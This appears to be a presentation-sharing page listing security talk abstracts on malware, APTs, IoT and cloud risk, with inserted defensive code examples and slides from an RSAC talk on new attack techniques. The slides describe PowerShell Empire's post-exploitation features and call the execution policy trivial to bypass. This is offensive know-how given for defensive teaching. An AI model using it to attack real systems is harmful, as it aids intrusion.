Which are the most dangerous new attack techniques for 2016/2017? How do they work? How can you stop them? What's coming next and how can you prepare? This fast-paced session provides answers from the three people best positioned to know: the head of the Internet Storm Center, the top hacker exploits expert and teacher in the U.S., and the top expert on cyberattacks on industrial control systems.
(Source: RSA USA 2016-San Francisco)
An advanced piece of malware known as ‘Regin’ has been used in systematic spying campaigns against a range of international targets, including government agencies and businesses, since at least 2008, according to reports from the IT security firms Symantec and Kaspersky Lab, both released on 24 November 2014. This presentation gives a brief overview of the threat. The malware is unusual in that its structure displays a degree of technical competence rarely seen; next to this complexity, Stuxnet looks dated.
This presentation gives a brief overview of WireLurker, the first malware family of its kind to hit Apple's iOS and Mac devices, platforms that had until then been regarded as largely untouchable. The slides are based on a report recently made public by Palo Alto Networks.
STAAF, An Efficient Distributed Framework for Performing Large-Scale Android ... (Praetorian)
There has been no shortage of Android malware analysis reports recently, but thus far that trend has not been accompanied by an equivalent scale of publicly released Android application analysis tools or frameworks. To address this issue, we are presenting the Scalable Tailored Application Analysis Framework (STAAF), released as a new OWASP project for public use under the Apache License 2.0. The goal of this framework is to allow a team of one or more analysts to efficiently analyze a large number of Android applications. In addition to large-scale analysis, the framework aims to promote collaborative analysis through shared processing and results.
Our framework is designed using a modular and distributed approach, which allows each processing node to be highly tailored for a particular task. At the heart of the framework is the Resource Manager (RM) module, which is responsible for tracking samples, managing analysis modules, and storing results. The RM also serves to reduce processing time and data management through the deduplication of data and work, and it also aids with the scheduling of tasks so that they can be completed as a pipeline or as a single unit. When processing begins, the RM uses several default "primitive" modules that carry out the fundamental operations, such as extracting the manifest, transforming the Dalvik bytecode, and extracting application resources. The analysis modules then use the raw results to extract specific attributes such as permissions, receivers, invoked methods, external resources accessed, control flow graphs, etc., and these results are then stored in a distributed data store, after which the information can be queried for high level trends or targeted searches.
The modular nature of our framework allows independent analyses to happen on a per-module basis, and the results of this data processing can be merged with other results at a later time. This design promotes an agile approach to large-scale analysis, because it permits a wide array of analyses to run in a distributed manner and in parallel. This means that teams with different needs or schedules can complete time-sensitive tasks separately with minimal data-processing pipelines, while more complex or time-intensive tasks can be added later. Additionally, if analysis needs to be branched at some point in the pipeline, intermediate results can be retained and additional modules can be added that leverage the results from past analysis steps. The results are also stored in a distributed database and designed to be queried using a map-reduce style query, which offers performance efficiencies as well as allowing the transparent inclusion of remote third-party analysis databases. By using this plug-in style analysis framework, we are able to attain more efficient processing schedules and tailor the analysis to a specific need.
This framework is designed to be scalable and extensible, and the initial offering of this framework includes several modules...
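A compact, runnable illustration of the architecture described above: a resource manager that deduplicates samples and work by content hash, "primitive" modules (manifest extraction) feeding analysis modules (permissions, receivers) that declare their dependencies, and results stored per sample hash so they can be reduced across the corpus. This is an added example written for this page, not STAAF's own code; the two sample APKs are constructed zips whose manifest is plain XML (as a decoder such as apktool would emit it) rather than the binary AXML a real APK carries, and the class, module and function names are this example's own.

```python
import hashlib
import io
import re
import zipfile
from collections import Counter
from typing import Callable, Dict, List


class Module:
    """One analysis step; `requires` names the modules whose results it consumes."""

    def __init__(self, name: str, run: Callable[[bytes, dict], object], requires=()):
        self.name, self.run, self.requires = name, run, tuple(requires)


class ResourceManager:
    """Tracks samples, deduplicates data and work, stores results per sample hash."""

    def __init__(self):
        self.samples: Dict[str, bytes] = {}    # sha256 -> raw bytes, stored once
        self.names: Dict[str, List[str]] = {}  # sha256 -> every filename seen for it
        self.results: Dict[str, dict] = {}     # sha256 -> {module name: result}
        self.modules: Dict[str, Module] = {}

    def register(self, module: Module) -> None:
        self.modules[module.name] = module

    def submit(self, filename: str, data: bytes) -> str:
        digest = hashlib.sha256(data).hexdigest()
        if digest not in self.samples:         # data dedup: identical bytes stored once
            self.samples[digest] = data
            self.results[digest] = {}
            self.names[digest] = []
        self.names[digest].append(filename)
        return digest

    def _run_module(self, digest: str, name: str) -> None:
        if name in self.results[digest]:       # work dedup: a step never runs twice
            return
        mod = self.modules[name]
        for dep in mod.requires:               # dependencies first, so modules chain as a pipeline
            self._run_module(digest, dep)
        self.results[digest][name] = mod.run(self.samples[digest], self.results[digest])

    def process(self, module_names=None) -> None:
        """Run the named modules (default: all registered) over every unique sample."""
        for digest in self.samples:
            for name in module_names or list(self.modules):
                self._run_module(digest, name)

    def query(self, module: str, reducer: Callable[[list], object]):
        """Map every sample's result for `module`, then reduce across the corpus."""
        return reducer([r[module] for r in self.results.values() if module in r])


# Primitive module: pull the manifest out of the APK, which is a zip.
def extract_manifest(data: bytes, _results: dict) -> str:
    with zipfile.ZipFile(io.BytesIO(data)) as apk:
        return apk.read("AndroidManifest.xml").decode("utf-8")


def _attr_names(tag: str, manifest: str) -> List[str]:
    return re.findall(rf'<{tag}\b[^>]*android:name="([^"]+)"', manifest)


def list_permissions(_data: bytes, results: dict) -> List[str]:
    return _attr_names("uses-permission", results["manifest"])


def list_receivers(_data: bytes, results: dict) -> List[str]:
    return _attr_names("receiver", results["manifest"])


def build_rm() -> ResourceManager:
    rm = ResourceManager()
    rm.register(Module("manifest", extract_manifest))
    rm.register(Module("permissions", list_permissions, requires=["manifest"]))
    rm.register(Module("receivers", list_receivers, requires=["manifest"]))
    return rm


def make_apk(manifest_xml: str) -> bytes:
    """Constructed, minimal APK-like zip for this example (plain-XML manifest)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", manifest_xml)
    return buf.getvalue()


SMS_APP = make_apk("""<manifest package="com.example.smsgrab">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application><receiver android:name=".SmsReceiver"/></application>
</manifest>""")
FLASHLIGHT = make_apk("""<manifest package="com.example.torch">
  <uses-permission android:name="android.permission.CAMERA"/>
</manifest>""")


def demo() -> dict:
    rm = build_rm()
    rm.submit("sample1.apk", SMS_APP)
    rm.submit("sample1-copy.apk", SMS_APP)   # same bytes under another name: stored once
    rm.submit("torch.apk", FLASHLIGHT)
    rm.process(["permissions"])              # time-sensitive pass first ...
    rm.process()                             # ... later modules reuse the manifest step
    counts = rm.query("permissions", lambda lists: Counter(p for l in lists for p in l))
    return {
        "unique_samples": len(rm.samples),
        "sms_receivers": rm.results[hashlib.sha256(SMS_APP).hexdigest()]["receivers"],
        "sms_permission_count": counts["android.permission.SEND_SMS"],
    }


if __name__ == "__main__":
    print(demo())
```

The second `process()` call shows the work-deduplication point: the manifest and permissions steps are not recomputed, only the newly requested receivers module runs, and the permission counter reduces over unique samples rather than over submissions.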
Kaspersky Lab’s Webinar ‘Emerging Threats in the APT World: Predictions for 2... (Kaspersky)
For several years now, Kaspersky Lab’s Global Research and Analysis Team (GReAT) has been monitoring more than 60 threat actors responsible for cyber-attacks worldwide. By closely observing these organizations, which appear to be fluent in many languages, including Russian, Chinese, German, Spanish, Arabic and Persian, we have put together a list of what seem to be the emerging threats in the APT world. We think these will play an important role in 2015 and deserve special attention. As a participant of the webinar, you will be the first to hear our detailed analysis of the trends.
The webinar was hosted by Costin Raiu, Director of GReAT at Kaspersky Lab, on December 11.
“If we can call 2014 ‘sophisticated’, then the word for 2015 will be ‘elusive’. We believe that APT groups will evolve to become stealthier and sneakier, in order to better avoid exposure. This year we’ve already discovered APT players using several zero-days, and we’ve observed new persistence and stealth techniques. We have used this to develop and deploy several new defense mechanisms for our users,” comments Costin Raiu.
Listen to the presentation https://kas.pr/aptwebinar
Read the full report https://kas.pr/ksb
Top 9 Critical Findings - Dramatically Improve Your Organization's Security (Praetorian)
As an information security consulting company, Praetorian has a unique ability to observe security programs across a wide range of companies. Based on the vulnerability patterns seen across organizations, a top ten list of common critical findings was created. The purpose of this presentation is to examine each of those critical findings and provide recommendations for mitigation. Examples from actual engagements are used to emphasize risk through real world scenarios. Some information from the screenshots provided has been redacted to protect confidentiality.
Praetorian's goal is to help our clients understand and minimize their overall security exposure and liability. Through our services, your organization can obtain an accurate, independent security assessment.
We at Kaspersky Lab believe that the online world should be free from attacks and state-sponsored espionage. And we've been standing by this belief for over 20 years, catching all kinds of cyberthreats, regardless of their origin.
Learn more about our principles of fighting cyberthreats and transparency from this brochure or on our website: https://www.kaspersky.com/about/transparency
Exploring Risk and Mapping the Internet of Things with Autonomous Drones (Praetorian)
Recently featured in Fortune Magazine, Praetorian’s Internet of Things Map Project gave the public a glimpse into potential risk associated with thousands of exposed Internet of Things devices it revealed. Paul Jauregui, Vice President of Praetorian, will share his experience leading the Internet of Things Mapping Project. In this session you will learn how Praetorian security engineers developed and outfitted an autonomous drone with custom ZigBee-sniffing hardware used to discover, fingerprint, and map several thousand Internet of Things devices in Austin, TX. The talk will also explore best practices and recommendations designed to help product teams avoid common Internet of Things embedded device security issues. This unique and entertaining session will engage the audience’s curiosity about emerging Internet of Things issues and showcase innovative approaches to exploring the Internet of Things landscape.
Presentation by Palo Alto Networks founder and CTO Nir Zuk on current security threats, how cyberterrorism has evolved, and ways to control it with the Palo Alto Networks Next-Generation Firewall.
Open Source has the potential to deliver faster development cycles and better security than traditional proprietary approaches to software. However, turning the potential of Open Source into reality can be difficult. Recent security issues like Heartbleed, Shellshock and the Panama Papers highlighted some of the challenges users of Open Source can face. This talk will explore how we can address them.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack. (Stefano Maccaglia)
The deck covers details about the Sunburst/Solorigate breach including some interesting threat intel paths we are currently evaluating to attribute the attack.
RSAC 2021 Spelunking Through the Steps of a Control System Hack (Dan Gunter)
Ever wonder what a hack on an industrial process using real-world Tactics, Techniques and Procedures (TTPs) really looks like? This session will demonstrate an attack step by step, from initial discovery, to physical impact, to reducing the chance of the attack happening in the first place.
7 Reasons Your Applications are Attractive to Adversaries (Derek E. Weeks)
Presentation from 18 November 2014.
Software applications need to be delivered faster and across more platforms than ever. To build high quality software in short order, we’ve seen a dramatic shift from source code to component-based development, with open source and third party components providing the innovation and efficiency that developers need.
Unfortunately, our dependence on components is growing faster than our ability to secure them. These shared components are not top-of-mind when considering application risk. Worse yet, components are increasingly the preferred attack surface in today’s applications.
The combination of growing component usage, coupled with lack of security, requires us to urgently re-evaluate traditional application security approaches and identify practical next steps for closing this security gap.
So what’s the “neglected 90%,” why is it attractive to your adversaries and what can you do about it? Plenty. Here are 7 key points, for starters.
http://bit.ly/AHC_USAF
Watch the webinar recording: http://hubs.ly/y0XwTS0
In this RSA Conference webcast, security experts Adi Sharabani and Yair Amit describe the current threat landscape for mobile devices and discuss security strategies.
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7 (Rapid7)
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Upwardly Mobile: Looking at Evolving Cybercrime Tactics in Mobile Malware (Priyanka Aash)
This session will cover two key trends in mobile malware observed over the past 12 months. It explores the evolution of fraud-linked mobile malware, where criminals are developing credential-theft tools that attempt to duplicate the success of Windows malware in modifying victims' interactions with targeted services, and it also looks at mobile ransomware variants, which are becoming more numerous and more damaging.
(Source: RSA USA 2016-San Francisco)
Secure application deployment in Apache CloudStack (Tim Mackey)
At the Apache CloudStack Collaboration Conference in Montreal, I presented a potential pathway to secure template management in CloudStack. Under this model, cloud providers can assess the templates their users have and potentially advise if deployed instances have application security issues which have either public disclosures, or better still remediation.
Empowering Application Security Protection in the World of DevOps (IBM Security)
Watch on-demand now: https://securityintelligence.com/events/application-security-protection-world-of-devops/
How do organizations build secure applications, given today's rapidly moving and evolving DevOps practices? Development teams are aware of the shifting security challenges they face. However, they're by no means security experts, nor do they have spare time on their hands to learn new tools.
What can development teams do to keep pace with rapidly-evolving application security threats?
The answer lies in automation. By making application security part of the continuous build processes, organizations can protect against these major risks.
In this session, you will learn:
- New security challenges facing today’s popular DevOps and Continuous Integration (CI) practices, including managing custom code and open source risks with containers and traditional environments.
- Best practices for designing and incorporating an automated approach to application security into your existing development environment.
- Future development and application security challenges organizations will face and what they can do to prepare.
Windows attacks receive all the attention. However, Mac and Linux have gained in popularity with the adversary. This session will focus on common Mac attack vectors and other cross-platform hacks that are typically seen in enterprise intrusions. We will also cover practical counter measures to make these alternate platforms more resilient.
(Source: RSA USA 2016-San Francisco)
As the industry’s first Secure Internet Gateway in the cloud, Cisco Umbrella provides the first line of defense against threats on the internet, protecting all your users within minutes.
Cisco Advanced Malware Protection offers global threat intelligence, advanced sandboxing and real-time malware blocking to prevent breaches while it continuously analyzes file activity across your network, so that you can quickly detect, contain and remove advanced malware.
Presentation of Cisco Security Architecture and Solutions such as Cisco Advanced Malware Protection (AMP) and Cisco Umbrella during Simplex-Cisco Technology Session that took place at the Londa Hotel in Limassol on 14 March 2018.
The Hacking Games - Operation System Vulnerabilities Meetup 29112022 (Lior Mazor)
Our technology, work processes and activities all depend on operating systems being safe and secure. Join us virtually for our upcoming "The Hacking Games - Operating System Vulnerabilities" meetup to learn how an attacker can compromise an operating system, bypass the antivirus protection layer and exploit Linux eBPF.
As seen with the IoT-based Mirai botnet, security vulnerabilities can have their root cause several layers down in the supply chain. The session will corroborate this with concrete vulnerability results from over 5,000 IoT software packages. It will also show how, to stop bugs being passed down the chain, developers, integrators and regulating bodies need to work together to build a trustworthy IoT software supply chain.
Cyber Hacking & Security - IEEE - Univ of Houston 2015-04 (Kyle Lai)
What is CyberSecurity? Who are the threats? Why is cyber attack happening? How bad is it? How do attackers do it? What can we learn from Star Wars?
This presentation covers cyber attacks, the state of cybersecurity, some guidance for students interested in getting into the field, and some useful resources.
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks (Dragos, Inc.)
Presentation by Robert M. Lee, CEO of Dragos, from RSA 2019.
Description: Most industrial security best practices are essentially enterprise security best practices copy-pasted into industrial networks. Yet that is not an effective way to reduce risk against industrial-specific threats. Instead, we can learn from the ICS attacks that have actually occurred. In this presentation, Robert M. Lee, CEO and co-founder of Dragos, will provide first-hand insights into industrial threats and the lessons learned for industrial security.
More information here: https://dragos.com/rsa-2019/
More info: www.dragos.com
Follow us on LinkedIn: https://www.linkedin.com/company/drag....
Follow us on Twitter: https://twitter.com/dragosinc
There are different types of attacks that expose enterprise data. An application can be attacked at various layers, on different hardware, and with very different goals in mind, creating a very complex problem for companies who want to protect their intellectual property.
Attacks on Critical Infrastructure: Insights from the “Big Board” (Priyanka Aash)
Targeted attacks on critical infrastructure continue to increase in number and severity. We’ll present the latest data on these attacks: What is their goal? What are the attacker strategies? How are attacks supported by the darknet? We’ll discuss banking threats discovered at the “Big Board” at the RSA Anti-Fraud Control Center and Smart Grid threat detection in the EU SPARKS project.
(Source: RSA USA 2016-San Francisco)
Digital Personal Data Protection (DPDP) Practical Approach For CISOs (Priyanka Aash)
Key Discussion Pointers:
1. Introduction to Data Privacy
- What is data privacy
- Privacy laws around the globe
- DPDPA Journey
2. Understanding the New Indian DPDPA 2023
- Objectives
- Principles of DPDPA
- Applicability
- Rights & Duties of Individuals
- Principals
- Legal implications/penalties
3. A practical approach to DPDPA compliance
- Personal data Inventory
- DPIA
- Risk treatment
It covers popular IaaS/PaaS attack vectors, lists them, and maps them to other relevant projects such as STRIDE and MITRE. Security professionals can better understand which attack vectors are commonly used in attacks, see examples of previous events, and learn where they should focus their controls and security efforts.
Discusses security incidents and business use cases, the pros and cons of Web 3, prevention mechanisms, and how to make sure it doesn't happen to you.
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore) (Priyanka Aash)
Round table discussion on "Emerging New Threats and Top CISO Priorities in 2022", Bangalore.
Date: 28 September 2022. Decision makers from different organizations joined this discussion and spoke on new threats and top CISO priorities.
Cloud Security: Limitations of Cloud Security Groups and Flow Logs (Priyanka Aash)
Cloud security groups are the firewalls of the cloud. They are built in and provide basic access-control functionality as part of the shared responsibility model. However, cloud security groups do not provide the same protection or functionality that enterprises have come to expect from on-premises deployments. In this talk we will discuss the top cloud risks in 2020, why perimeters are a concept of the past, and how, in a world with no perimeters, cloud security groups, the "cloud firewalls", fit in. We will practically explore cloud security group limitations across different cloud setups, from a single vNet to multi-cloud.
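The two limitations the abstract points at can be made concrete with a small audit script. It checks AWS-style security group ingress rules for management ports open to the whole internet (weak group beside its corrected form), and then lists the rules of an intended firewall policy that no security group can carry at all, because AWS security groups are allow-only and match solely on protocol, port and source. This is an added example written for this page, not code from the talk; the rule dicts follow the IpPermissions shape of EC2 DescribeSecurityGroups, and the group IDs, CIDRs, hostnames and policy are constructed.

```python
from typing import List

MANAGEMENT_PORTS = {22: "ssh", 3389: "rdp", 5985: "winrm", 5986: "winrm-https"}
ANYWHERE = {"0.0.0.0/0", "::/0"}
# The only attributes an AWS security group rule can match on.
SG_MATCH_KEYS = {"proto", "port", "src_cidr"}


def _sources(perm: dict) -> List[str]:
    """All CIDR sources (IPv4 and IPv6) named by one IpPermissions entry."""
    return ([r["CidrIp"] for r in perm.get("IpRanges", [])]
            + [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])])


def _covers_tcp_port(perm: dict, port: int) -> bool:
    if perm["IpProtocol"] == "-1":            # "-1" means every protocol and every port
        return True
    return (perm["IpProtocol"] in ("tcp", "6")
            and perm["FromPort"] <= port <= perm["ToPort"])


def audit_group(group: dict) -> List[str]:
    """One finding per management port, or all-traffic rule, reachable from the internet."""
    findings = []
    for perm in group["IpPermissions"]:
        if not any(src in ANYWHERE for src in _sources(perm)):
            continue                          # only internet-wide sources matter here
        if perm["IpProtocol"] == "-1":
            findings.append(f"{group['GroupId']}: all traffic allowed from the internet")
            continue
        for port, service in MANAGEMENT_PORTS.items():
            if _covers_tcp_port(perm, port):
                findings.append(f"{group['GroupId']}: {service} ({port}/tcp) open to the internet")
    return findings


def unexpressible(policy: List[dict]) -> List[dict]:
    """Policy rules a security group cannot carry: deny actions, or matches on
    anything beyond protocol/port/source CIDR (FQDN, URL, application, user)."""
    return [rule for rule in policy
            if rule["action"] == "deny" or not set(rule["match"]) <= SG_MATCH_KEYS]


# Constructed: a weak group and its corrected form for the same web host.
WEAK_GROUP = {
    "GroupId": "sg-0example",
    "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
        {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
    ],
}
HARDENED_GROUP = {
    "GroupId": "sg-0example",
    "IpPermissions": [
        # SSH only from the bastion subnet; HTTPS stays public because the service needs it.
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "IpRanges": [{"CidrIp": "10.20.0.0/24"}]},
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "IpRanges": [{"CidrIp": "0.0.0.0/0"}]},
    ],
}
# Constructed: what the on-premises firewall policy for this host used to say.
INTENDED_POLICY = [
    {"action": "allow", "match": {"proto": "tcp", "port": 443, "src_cidr": "0.0.0.0/0"}},
    {"action": "deny", "match": {"proto": "tcp", "port": 443, "src_cidr": "198.51.100.0/24"}},
    {"action": "allow", "match": {"fqdn": "updates.example.com", "port": 443}},
]

if __name__ == "__main__":
    for line in audit_group(WEAK_GROUP):
        print(line)
    print("hardened findings:", audit_group(HARDENED_GROUP))
    print("rules a security group cannot express:", len(unexpressible(INTENDED_POLICY)))
```

The two rules the script rejects are exactly the gap the talk describes: blocking the abusive source range needs a network ACL (which does support deny rules) or an inspection layer in front of the host, and the by-name egress rule needs an egress proxy or a domain-aware firewall, since a security group sees only addresses and ports. The same limitation applies on the telemetry side: VPC flow logs record the 5-tuple and byte counts of accepted and rejected flows, not payload, so they can confirm that the SSH rule above was hit but not what was done over the session.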
Most organizations have good enterprise-level security policies that define their approach to maintaining, improving, and securing their information and information systems. However, once the policies are signed by senior leadership and distributed throughout the organization, significant cybersecurity governance challenges remain. In this workshop I will explain the transforming organizational security to strengthen defenses and integrate cybersecurity with the overall approach toward security governance, risk management and compliance.
The Internet is home to seemingly infinite amounts of confidential and personal information. As a result of this mass storage of information, the system needs to be constantly updated and enforced to prevent hackers from retrieving such valuable and sensitive data. This increasing number of cyber-attacks has led to an increasing importance of Ethical Hacking. So Ethical hackers' job is to scan vulnerabilities and to find potential threats on a computer or networks. An ethical hacker finds the weakness or loopholes in a computer, web applications or network and reports them to the organization. It requires a thorough knowledge of Networks, web servers, computer viruses, SQL (Structured Query Language), cryptography, penetration testing, Attacks etc. In this session, you will learn all about ethical hacking. You will understand the what ethical hacking, Cyber- attacks, Tools and some hands-on demos. This session will also guide you with the various ethical hacking certifications available today.
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
PHP Frameworks: I want to break free (IPC Berlin 2024) - Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
JMeter webinar - integration with InfluxDB and Grafana - RTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do... - UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
- See how to accelerate model training and optimize model performance with active learning
- Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
- Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Neuro-symbolic is not enough, we need neuro-*semantic* - Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this is illustrated with link prediction over knowledge graphs, but the argument is general.
Essentials of Automations: Optimizing FME Workflows with Parameters - Safe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
State of ICS and IoT Cyber Threat Landscape Report 2024 preview - Prayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio's cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors and newer malware, including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
- State of global ICS asset and network exposure
- Sectoral targets and attacks as well as the cost of ransom
- Global APT activity, AI usage, actor and tactic profiles, and implications
- Rise in volumes of AI-powered cyberattacks
- Major cyber events in 2024
- Malware and malicious payload trends
- Cyberattack types and targets
- Vulnerability exploit attempts on CVEs
- Attacks on counties – USA
- Expansion of bot farms – how, where, and why
- In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
- Why are attacks on smart factories rising?
- Cyber risk predictions
- Axis of attacks – Europe
- Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo... - James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Accelerate your Kubernetes clusters with Varnish Caching - Thijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
1. #RSAC
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
SESSION ID: EXP-T09R
MODERATOR:
Alan Paller, Director of Research, SANS Institute
PANELISTS:
Dr. Johannes Ullrich, Dean of Research at STI (SANS’ Graduate School), Director of the Internet Storm Center
Michael Assante, Director of SANS ICS Training Programs; was VP and CISO of NERC; directed INL’s Electric Power Program; testified before US House and Senate
Ed Skoudis, leads SANS Pen Testing and Hacker Exploits Immersion Training Programs; created NetWars & CyberCity Simulators; author of Counter Hack Reloaded
2. #RSAC
Ed Skoudis
-- Leads SANS Pen Testing and Hacker Exploits Immersion Training Programs
-- Created NetWars & CyberCity Simulators
-- Author of Counter Hack Reloaded
3. #RSAC
Top Threats - Skoudis
Broadening Targets
Full Weaponization of Windows PowerShell
What Stagefright Tells Us About Mobile Security Going Forward
XcodeGhost – How Will You Trust Your Apps Going Forward?
4. #RSAC
Broadening Targets
The last 12 months have shown the threat’s focus is broadening
PII still a target, but much more is in play now
OPM attack
Government background check data and fingerprints
Ashley Madison attack
Sensitive personal information at play
Extortion malware stealing browser history
Ukrainian power grid attack
5. #RSAC
Defenses Against Broadening Threats
Don’t assume that you are safe just because you lack PII
Attackers are devising clever uses for all kinds of data with criminal and national security implications
Vigorously apply robust security standards focused on actual attack techniques used in the wild
Twenty Critical Controls
IAD Top 10 Information Assurance Mitigation Strategies
Australian Signals Directorate Top 4 Mitigation Strategies
6. #RSAC
Windows PowerShell Weaponization
PowerShell Empire – Amazing integrated post-exploitation capabilities
By Will Schroeder, Justin Warner, and more
PowerShell Empire features:
Powerful agent
Pillaging / Privilege escalation
Pivoting / Lateral movement
Persistence
Integrated with attacker operations
All free and incredibly easy to use, and often works even with application whitelisting
7. #RSAC
Weaponized PowerShell Defenses
Don’t rely on PowerShell’s limited execution policy
A safety feature, not a security feature… trivial to bypass
Enhanced logging in PowerShell 5
Pipeline logging, deep script block logging, and more
Win 10 AntiMalware Scan Interface (AMSI)
All script content presented to registered antimalware solution on the box
PowerShell 5 Constrained Mode and AppLocker integration with “Deny Mode” and “Allow Mode” – behaves like script whitelisting
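The script block logging the slide recommends only pays off if someone hunts through it. As an added example (not from the talk, and not Empire's or Microsoft's code), this Python detector reassembles event 4104 fragments by ScriptBlockId before matching, because PowerShell splits long script blocks across several events and a keyword that straddles a fragment boundary is missed by per-fragment matching. The event records and the indicator list are constructed.

```python
import re
from collections import defaultdict
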